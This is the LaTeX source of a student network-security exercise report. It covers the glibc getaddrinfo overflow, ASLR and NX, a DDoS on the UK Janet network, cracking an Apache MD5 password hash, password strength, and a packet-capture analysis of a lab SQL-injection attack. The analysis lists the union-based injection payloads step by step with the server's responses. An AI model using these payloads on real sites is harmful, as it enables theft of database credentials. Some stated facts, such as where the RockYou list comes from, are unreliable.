\documentclass[a4paper]{article}
\usepackage{tabularx}
\usepackage{makecell, rotating}
\usepackage{multirow}
\usepackage[english]{babel}
\usepackage[utf8]{inputenc}
\usepackage{amsmath}
\usepackage{graphicx}
%\usepackage[colorinlistoftodos]{todonotes}
\usepackage{url}
\usepackage{hyperref}
\usepackage{breakurl} 
\usepackage[shortlabels]{enumitem}
\urlstyle{same}

\usepackage{afterpage}
\usepackage{placeins}
\usepackage{longtable}

% \usepackage{sectsty}% http://ctan.org/pkg/sectsty
% \usepackage{xcolor}% http://ctan.org/pkg/xcolor
% \allsectionsfont{\color{blue}\underline}

% For comments
\usepackage{verbatim}

% print escape characters
\usepackage[T1]{fontenc}
\usepackage{lmodern}
\newcommand*{\escape}[1]{\texttt{\textbackslash#1}}
\newcommand*{\escapeI}[1]{\texttt{\expandafter\string\csname #1\endcsname}}
\newcommand*{\escapeII}[1]{\texttt{\char`\\#1}}

\title{NetSec - Exercise 02}
\author{\textbf{Che-Hao Kang, Aman Azim}}
\date{\today}

\usepackage{color}
\usepackage[dvipsnames]{xcolor}
\makeatletter
\renewcommand\section{\@startsection {section}{1}{\z@}%
                                   {-3.5ex \@plus -1ex \@minus -.2ex}%
                                   {2.3ex \@plus.2ex}%
                                   {\normalfont\Large\bfseries\color{NavyBlue}}}
\renewcommand\subsection{\@startsection{subsection}{2}{\z@}%
								 {-3.25ex\@plus -1ex \@minus -.2ex}%
								{1.5ex \@plus .2ex}%
								{\color{NavyBlue}\sffamily\large\bfseries}}
\renewcommand\subsubsection{\@startsection{subsubsection}{3}{\z@}%
								 {-3.0ex\@plus -1ex \@minus -.2ex}%
								{1.0ex \@plus .2ex}%
								{\color{NavyBlue}\ttfamily\normalsize\bfseries}}
\makeatother

\usepackage{mathtools}
\newcommand\Myperm[2][n]{\prescript{#1\mkern-2.5mu}{}P_{#2}}
\newcommand\Mycomb[2][n]{\prescript{#1\mkern-0.5mu}{}C_{#2}}

\begin{document}
\maketitle

%\begin{abstract}
%%Your abstract.
%\end{abstract}

\section*{Task 2.1 (theoretical): glibc exploit}
The \textbf{Common Vulnerabilities and Exposures (CVE)} system provides a reference-method for publicly known information-security vulnerabilities and exposures. CVE’s common identifiers make it easier to share data across separate network security databases and tools, and provide a baseline for evaluating the coverage of an organization’s security tools.

\subsection*{\underline{CVE-2015-7547}}
%\subsection*{CVE-2015-7547}
%\vspace{2 pt}\\
CVE-2015-7547, is a \textbf{stack-based buffer overflow} vulnerability in \textbf{glibc}'s DNS client-side resolver function \textbf{getaddrinfo()}\\\\
\texttt{
\indent\indent int getaddrinfo(const char* hostname,\\
\indent\indent\indent\indent\indent\indent\indent\ \ const char* service,\\
\indent\indent\indent\indent\indent\indent\indent\ \ const struct addrinfo* hints,\\
\indent\indent\indent\indent\indent\indent\indent\ \ struct addrinfo** res); }\\\\
that is used to translate human-readable domain names, like google.com, into a network IP address. This can be exploited in a variety of scenarios, including man-in-the-middle attacks, maliciously crafted domain names, and malicious DNS servers.

\subsubsection*{How Does the Flaw Work?}
The buffer overflow flaw is triggered when the getaddrinfo() library function that performs domain-name lookups is in use, allowing hackers to remotely execute malicious code.

The flaw can be exploited when an affected device or app make queries to a malicious DNS server that returns too much information to a lookup request and floods the program's memory with code. This code then compromises the vulnerable application or device and tries to control the whole system.

It is possible to inject the domain name into server log files, which when resolved will trigger remote code execution. An SSH (Secure Shell) client connecting to a server could also be compromised.

However, an attacker need to bypass several operating system security mechanisms – like \textbf{ASLR} and \textbf{non-executable stack protection} – in order to achieve successful \textbf{RCE(remote code execution)} attack. Alternatively, an attacker on your network could perform \textbf{man-in-the-middle (MITM)} attacks and tamper with DNS replies in a view to monitoring and manipulating (injecting payloads of malicious code) data flowing between a vulnerable device and the Internet.

\subsubsection*{Things happen to glibc}
\textbf{glibc} reserves 2048 bytes in the stack through alloca() for the DNS answer at \textbf{\_nss\_dns\_gethostbyname4\_r()} for hosting responses to a DNS query. Later on, at \textbf{send\_dg()} and \textbf{send\_vc()}, if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.

Under certain conditions a \textbf{mismatch between the stack buffer and the new heap allocation} will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.

\subsubsection*{Affected Software and Devices}
All versions of glibc after 2.9 are vulnerable. Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK. The widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely. The vulnerability could extend to a nearly all the major software, including:
\begin{itemize}
\item Virtually all distributions of Linux.
\item Programming languages such as the Python, PHP, and Ruby on Rails.
\item Many others that use Linux code to lookup the numerical IP address of an Internet domain.
\item Most Bitcoin software is reportedly vulnerable, too.
\end{itemize}

\subsection*{\underline{ASLR (Address Space Layout Randomization)}}
%\subsection*{ASLR (Address Space Layout Randomization)}
Address space layout randomization (ASLR) is a memory-protection process for operating systems (OSes) that guards against buffer-overflow attacks by randomizing the location where system executables are loaded into memory.
ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.

\subsubsection*{How it works}
The success of many cyber-attacks, particularly zero-day exploits, relies on the hacker's ability to know or guess the position of processes and functions in memory. For example, attackers trying to execute \textbf{return-to-libc} attacks must locate the code to be executed, while other attackers trying to execute shellcode injected on the stack have to find the stack first. ASLR is able to put address space targets in unpredictable locations. If an attacker attempts to exploit an incorrect address space location, the target application will crash, stopping the attack and alerting the system.  

\subsection*{\underline{NX (No eXecute, non-executable stack)}}
%\subsection*{NX (No eXecute, non-executable stack)}
The NX bit is a feature of the Memory Management Unit of some CPU (including recent enough x86). It allows to mark each memory page as being "allowed" or "disallowed" for code execution. The MMU is under control of the kernel and the kernel code decides which pages get the execution privilege and which do not.

\subsubsection*{Usage}
NX is used to prevent certain types of malicious software from taking over computers by inserting their code into another program's data storage area and running their own code from within this section. One class of such attacks is known as the buffer overflow attack.


\section*{Task 2.2 (theoretical): Recent vulnerabilities, attacks or breaches}
\subsection*{Janet down: Computer network at UK (United Kingdom) universities continues to face problems after DDoS cyber-attack}
On \textbf{7 December 2015}, \textbf{Janet}, the computer network that supports academic services at universities around the country, is facing problems due to a Distributed Denial of Service cyber-attack.
Janet is the network responsible for running the country's .ac.uk and .gov.uk domains, so the attack has resulted in many universities, colleges and some councils seeing their websites go down or slow significantly. Janet also responsible for the Eduroam Wi-Fi network that is used by many universities across UK.

\subsubsection*{How did attack happen?}
A DDoS attack is when an online service is brought down or interrupted by being overwhelmed by traffic from multiple sources. Hackers can perform a DDoS attack by creating 'bot' computers by infecting thousands of home computers with malware, and instructing them to all attack a certain site at once, bringing it down. DDoS attacks typically last for around 24 hours, but the current attack on Janet has now been going on for much longer than that. It was this kind of attack that was used on Talk Talk in October, bringing the service down and allowing hackers to steal the information of tens of thousands of customers.

\subsubsection*{\underline{What/who is/was affected?}}
Mainly the universities were affected and the direct victims of attack were the administration, students and somehow the professors. External factors could be anyone who has direct or indirect involvement in university related activities like Higher Education Department etc.

\subsubsection*{\underline{Are you affected (if so, how did you react)?}}
%\subsubsection*{Are you affected (if so, how did you react)?}
No.

\subsubsection*{\underline{May the university be affected?}}
%\subsubsection*{May the university be affected?}
Universities all over the UK were affected but people who were working with these universities and using their services from outside the UK (United Kingdom) also affected.

\subsubsection*{\underline{Which sources of information have you chosen and} \\\underline{what do you think about the quality of the sources?}}
%\subsubsection*{Which sources of information have you chosen and what do you think about the quality of the sources?}
I have chosen most links from very reliable resources like BBC and also read about these attacks on different Universities websites and seen some videos about them so I think that these given information could be reliable.


\section*{Task 2.3 (practical): Website Login credentials}
From \textbf{\href{https://httpd.apache.org/docs/2.4/misc/password\_encryptions.html}{Apache website}} , \textbf{\$apr1\$} passwords are generated by \textbf{MD5} and salts are included to have diverse passwords which is between two dollar(\textbf{\$}) signs. For example, in \textbf{netsec:\$apr1\$/pE9u4cQ\$ZfQfXfZ8NWh2gfFpIx22T0}, the salt is \textbf{/pE9u4cQ}.

Having this information in hand, we can use programming to import the document, extract English words and employ Linux command to produce all corresponding MD5 passwords. 

Once the MD5 password is the same as \textbf{\$apr1\$/pE9u4cQ\$ZfQfXfZ8NWh2gfFpIx22T0}, we are done!
  \begin{figure}[!h]
    \begin{center}
      \includegraphics[width=1.0\textwidth]{practicalPic}
      \caption{Flow Chart of Our Approach}
      \vskip 0 pt
      \label{fig:practicalPic}
    \end{center}
  \end{figure}

\noindent\textsl{Programming details (\textbf{\href{https://goo.gl/hvM4rt}{source code}})} :

\begin{enumerate}[a)]
\item   \begin{figure}[!htb]
    \begin{center}
      \includegraphics[width=1.0\textwidth]{code1}
      \vskip 0 pt
      \label{fig:code1}
    \end{center}
  \end{figure}
\item \begin{figure}[!htb]
    \begin{center}
      \includegraphics[width=1.0\textwidth]{code2}
      \vskip 0 pt
      \label{fig:code2}
    \end{center}
  \end{figure}
\item \begin{figure}[!htb]
    \begin{center}
      \includegraphics[width=1.0\textwidth]{code3}
      \vskip 0 pt
      \label{fig:code3}
    \end{center}
  \end{figure}
\item \begin{figure}[!htb]
    \begin{center}
      \includegraphics[width=1.0\textwidth]{code4}
      \vskip 0 pt
      \label{fig:code4}
    \end{center}
  \end{figure}
\item \begin{figure}[!htb]
    \begin{flushleft}
      \includegraphics[width=0.6\textwidth]{code5}
      \vskip 0 pt
      \label{fig:code5}
    \end{flushleft}
  \end{figure}
\end{enumerate}

\FloatBarrier
\section*{Task 2.4 (theoretical): Password Complexity}
\subsection*{Part a) Dictionary Attacks}
\subsubsection*{1. Search online for the “RockYou word list”. What is it? Where does it come from? Do you think it is a suitable list to crack real-life passwords?}
{\large \textbf{What is it?}}\\
RockYou wordlist is a text file we can download from websites. In this file, lots of commonly used passwords are included for cracking users' passwords. Furthermore, hackers can utilize this file to guess people's passwords and then get confidential information from their accounts. \texttt{(e.g., 3905940, brown914, dicte1505 and rocket623)}\\\\
{\large \textbf{Where does it come from?}}\\
This file is from the BackTrack Linux distro developers Offensive Security Limited. In Kali Linux versions, we can directly employ it offline which is based on BackTrack.\\\\
{\large \textbf{Do you think it is a suitable list to crack real-life passwords?}}\\
We don't think so. Nowadays, websites require users to have more complex passwords. Otherwise, they are unable to register. That is, even though hackers have this file, it is not so probable to guess passwords efficiently.

\subsubsection*{2. What do we learn about how most users picked their password?}
From RockYou word list, we can discover lots of passwords are composed by an English word and a following number. The English word is often related to people's names (Jason, Henry, etc.) or commonly-used words (brown, grey, etc.); the number is corresponding to birthdays or memorable days.

\subsubsection*{3. How would you define “weak” and “strong” passwords in general? Why?}
A weak password usually consists of common words or simple numbers such as "happy1234" or "jordan23". Also, people tend to choose information that is personal to them as passwords. For this kind of weak passwords, it is easier for hackers to guess.\\

\noindent A strong password must be more difficult to be guessed. It usually comprises special symbols (\#, \$, \%, etc.), lowercase and capital letters and numbers. Even the position of each character is randomly arranged. For this scenario, hackers need to spend more time cracking passwords because lost of combinations have to be taken into consideration.

\subsubsection*{4. Optional question: Is your favorite password in the list?}
No, my password is not in the list because I use diverse symbols in it.

\subsection*{b) Brute-Force Attacks}
Brute-force attacks are to gather related data and generate all probable combinations. If the data is huge, it will take much time to produce all kinds of passwords.

When generating a password with length n, we need to see how many characters in hand. Let's say, C represents the whole characters which is composed of U, L, D and S and the cardinality is $c=|C|$. Based on this, we can easily use $\Myperm[c]{n} = \frac{c!}{(c-n)!}$ to stand for the number of whole combinations.

From this formula, we know the number of possible passwords will grow faster when n increases.

\section*{Task 2.5 (theoretical): PCAP Analysis \#1}
\subsection*{• What kind of data is contained in the trace file?}
This PCAP file contains packet data from one peer to another, e.g., source and destination addresses, sequence number (Seq),  window size (Win) and acknowledgement number (Ack).
We can derive useful information from these data. For example, the first three frames demonstrate a three-way-handshake.

\subsection*{• The trace file contains an attack. What is the target?}
This attack is SQL injection. Its aim is to gain credentials from the server such as passwords.

\subsection*{• Please give an overall sketch of the attacker’s actions.}
\begin{enumerate}[Step 1)]
\item The attacker submitted different ids to figure out this table's structure: \textbf{no data returned with id=0 and data found with id=1}.

{\fontfamily{pcr}\fontsize{9pt}{2pt}\selectfont
Request$\Rightarrow$ GET /vulnerabilities/sqli/?\textbf{id=0}\&Submit=Submit HTTP/1.1\verb!\r\n!
Response$\Rightarrow$ N/A
}
\\\\
{\fontfamily{pcr}\fontsize{9pt}{2pt}\selectfont
Request$\Rightarrow$ GET /vulnerabilities/sqli/?\textbf{id=1}\&Submit=Submit HTTP/1.1\verb!\r\n!
Response$\Rightarrow$ ID: 1<br>First name: admin<br>Surname: admin
}

(The meaning of \textbf{id=X} is similar to "\textbf{select * from TABLE where id=X}".)\\
From "\textbf{First name: admin}" and "\textbf{Surname: admin}", we know there are two columns ("First name" and "Surname") and "\textbf{admin}" is one of the users.

\item The attacker used "\textbf{id=1 or 1=1}" to extract all users from the server:
{\fontfamily{pcr}\fontsize{9pt}{2pt}\selectfont
First name: admin<br>Surname: admin\\
First name: Gordon<br>Surname: Brown\\
First name: Hack<br>Surname: Me\\
First name: Pablo<b
}

\item "\textbf{id=1 or 1=1 union select 1}" is to guess how many columns the original table has. Because "\textbf{union}" is included and "\textbf{select 1}" means the generated table has only one column, if the number of columns of the original table is NOT the same as the generated one, the server will return error messages.

In this case, it is "\textbf{The used SELECT statements have a different number of columns}".

That is, the original table has \textbf{more than one column}.

\item "\textbf{id=1 or 1=1 union select 1,2}" is similar to the above one but this time the attacker guessed there are two columns of the original table. The received message is:\\
{\fontfamily{pcr}\fontsize{9pt}{2pt}\selectfont
First name: admin<br>Surname: admin\\
First name: Gordon<br>Surname: Brown\\
First name: Hack<br>Surnam\\
}
This indicates that the original table \textbf{has two columns}.

\item The attacker employed "\textbf{id=1 or 1=1 union select null, concat(first\_name,0x3a,pass) from users}" to guess the column names ("\textbf{first\_name}" and "\textbf{pass}") of table "\textbf{users}". 

The function of "\textbf{concat}" is to concatenate strings together. For example, if first\_name="Jordan" and pass="23", the result of concat("Jordan",0x3a,"23") is "\textbf{Jordan:23}" (0x3a equal to ":").

But, the server returned "\textbf{Unknown column 'pass' in 'field list'}". That is, the attacker needs to have another method due to the wrong guess of column names of table "users".

\item "\textbf{id=1 or 1=1 union select null, concat(table\_name,0x0a,column\_name) from information\_schema.columns}" is to explore the server's tables and corresponding columns. The response of table "\textbf{users}" is:\\
{\fontfamily{pcr}\fontsize{9pt}{2pt}\selectfont
<br>First name: <br>Surname: users\verb!\n!\\
user\_id\\
<br>First name: <br>Surname: users\verb!\n!\\
first\_name\\
<br>First name: <br>Surname: users\verb!\n!\\
last\_name\\
<br>First name: <br>Surname: users\verb!\n!\\
user\\
<br>First name: <br>Surname: users\verb!\n!\\
password\\
<br>First name: <br>Surname: users\verb!\n!\\
avatar</pre>\\
(\textbf{0x0a} equal to "\verb!\n!")\\
}
From this, we know table "users" has columns which are "user\_id", "first\_name", "last\_name", "user", "password" and "avatar".

\item "\textbf{id=1 or 1=1 union select null, concat(first\_name,0x3a,password) from users}" tried to exploit the server's private data but FAILED because the response doesn't contain any user's password but "First name: admin<br>Surname: admin" which is merely normal data.
\end{enumerate}
\begingroup
\renewcommand\arraystretch{1.5}
        \begin{longtable}{|c|l|p{7cm}|}
          \caption{Summary of the attacker's approach}
          \label{tab:attackApproach} \\
          \hline
          \textbf{Steps} & \textbf{Commands} & \textbf{Responses} \\ \hline 
          \endfirsthead
		  \multicolumn{3}{c}%
		  {\tablename\ \thetable\ -- \textit{Continued from previous page}} \\
		  \hline
		  \textbf{Steps} & \textbf{Commands} & \textbf{Responses} \\ \hline
		  \endhead
		  \multicolumn{3}{r}{\textit{Continued on next page}} \\
		  \endfoot
		  \hline
		  \endlastfoot
          \hline
          \multirow{2}{*}{Step 1} & 
          id=0 & N/A \\
          \cline{2-3}
          & id=1 & First name: admin<br>Surname: admin \\
          \hline
          Step 2 & id=1 or 1=1 &
          \makecell[l]{First name: admin<br>Surname: admin\\
          First name: Gordon<br>Surname: Brown\\
          First name: Hack<br>Surname: Me\\
          First name: Pablo<b
          }
          \\
          \hline
          Step 3 & id=1 or 1=1 union select 1 & The used SELECT statements have a different number of columns \\
          \hline
          Step 4 & id=1 or 1=1 union select 1,2 & 
          \makecell[l]{First name: admin<br>Surname: admin\\
		  First name: Gordon<br>Surname: Brown\\
		  First name: Hack<br>Surnam\\
          }\\
		  \hline
          Step 5 & \makecell[l]{id=1 or 1=1 union select null, \\concat(first\_name,0x3a,pass) \\from users} & Unknown column 'pass' in 'field list'\\
          \hline
          Step 6 & \makecell[l]{id=1 or 1=1 union select null, \\concat(table\_name,0x0a,column\_name) \\from information\_schema.columns} & 
          \makecell[l]{
<br>First name: <br>Surname: users\escape{n}\\
<br>First name: <br>Surname: users\escape{n}\\
user\_id\\
<br>First name: <br>Surname: users\escape{n}\\
first\_name\\
<br>First name: <br>Surname: users\escape{n}\\
last\_name\\
<br>First name: <br>Surname: users\escape{n}\\
user\\
<br>First name: <br>Surname: users\escape{n}\\
password\\
<br>First name: <br>Surname: users\escape{n}\\
avatar
}\\
          \hline
          Step 7 & \makecell[l]{id=1 or 1=1 union select null, \\concat(first\_name,0x3a,password) \\from users} & First name: admin<br>Surname: admin \\
%        \end{tabular}
    \end{longtable}
\endgroup

\FloatBarrier
\subsection*{• What is the exploit vector, i.e. what weakness is targeted by the attack?}
The server doesn't implement security measures of SQL. Due to this, attackers are able to inject abnormal SQL commands to steal servers' credentials and thus use those to intercept more useful information.

\subsection*{• By analyzing the trace file, would you say this attack ultimately compromises the victim system or would you expect further steps?}
We think it didn't finish its job because no more intrusion is deployed. Once attackers get credentials, they should try to log in to the server and retrieve confidentiality such as business secrets to leverage the benefit.

\subsection*{• Was the attack successful?}
We think it failed because it didn't get any user's password.

\subsection*{• Can you find information about related attack methods on the Internet?}
We found "\textbf{sqlmap.py}" is well-known and used to exploit servers' database.
For example, the below command can dump column information of table "\textbf{users}".
(\href{http://www.admin-magazine.com/Articles/Uncovering-SQL-Injections}{Reference Website})
\begin{figure}[!h]
    \begin{center}
      \includegraphics[width=0.8\textwidth]{sqlmap}
      \vskip 0 pt
      \label{fig:sqlmap}
    \end{center}
\end{figure}
\begin{figure}[!h]
    \begin{center}
      \includegraphics[width=0.6\textwidth]{tableInfo}
      \vskip 0 pt
      \caption{Content of table \textbf{users}}
      \label{fig:tableInfo}
    \end{center}
\end{figure}

\subsection*{• How can you secure a system against these kinds of attacks?}
We have to implement "\textbf{String Inspection Mechanism}" to check if users input too many irrelevant characters or SQL-related commands.
Once filtering out those suspicious data, we are able to secure servers with a less intrusion rate.






%+++ comment out
\begin{comment}  % 註解開始
\section{Some \LaTeX{} Examples}
\label{sec:examples}

\subsection{How to Leave Comments}

Comments can be added to the margins of the document using the \todo{Here's a comment in the margin!} todo command, as shown in the example on the right. You can also add inline comments:

\todo[inline, color=green!40]{This is an inline comment.}

\subsection{How to Include Figures}

First you have to upload the image file (JPEG, PNG or PDF) from your computer to writeLaTeX using the upload link the project menu. Then use the includegraphics command to include it in your document. Use the figure environment and the caption command to add a number and a caption to your figure. See the code for Figure \ref{fig:frog} in this section for an example.

\begin{figure}
\centering
\includegraphics[width=0.3\textwidth]{frog.jpg}
\caption{\label{fig:frog}This frog was uploaded to writeLaTeX via the project menu.}
\end{figure}

\subsection{How to Make Tables}

Use the table and tabular commands for basic tables --- see Table~\ref{tab:widgets}, for example.

\begin{table}
\centering
\begin{tabular}{l|r}
Item & Quantity \\\hline
Widgets & 42 \\
Gadgets & 13
\end{tabular}
\caption{\label{tab:widgets}An example table.}
\end{table}

\subsection{How to Write Mathematics}

\LaTeX{} is great at typesetting mathematics. Let $X_1, X_2, \ldots, X_n$ be a sequence of independent and identically distributed random variables with $\text{E}[X_i] = \mu$ and $\text{Var}[X_i] = \sigma^2 < \infty$, and let
$$S_n = \frac{X_1 + X_2 + \cdots + X_n}{n}
      = \frac{1}{n}\sum_{i}^{n} X_i$$
denote their mean. Then as $n$ approaches infinity, the random variables $\sqrt{n}(S_n - \mu)$ converge in distribution to a normal $\mathcal{N}(0, \sigma^2)$.

\subsection{How to Make Sections and Subsections}

Use section and subsection commands to organize your document. \LaTeX{} handles all the formatting and numbering automatically. Use ref and label commands for cross-references.

\subsection{How to Make Lists}

You can make lists with automatic numbering \dots

\begin{enumerate}
\item Like this,
\item and like this.
\end{enumerate}
\dots or bullet points \dots
\begin{itemize}
\item Like this,
\item and like this.
\end{itemize}
\dots or with words and descriptions \dots
\begin{description}
\item[Word] Definition
\item[Concept] Explanation
\item[Idea] Text
\end{description}

We hope you find write\LaTeX\ useful, and please let us know if you have any feedback using the help menu above.
\fi
\end{comment}  % 註解結尾

\clearpage
%\newpage
%---- Bibliography
\def\UrlBreaks{\do\/\do-}
\bibliographystyle{unsrt}
\bibliography{bibliography}
\nocite{*}

\end{document}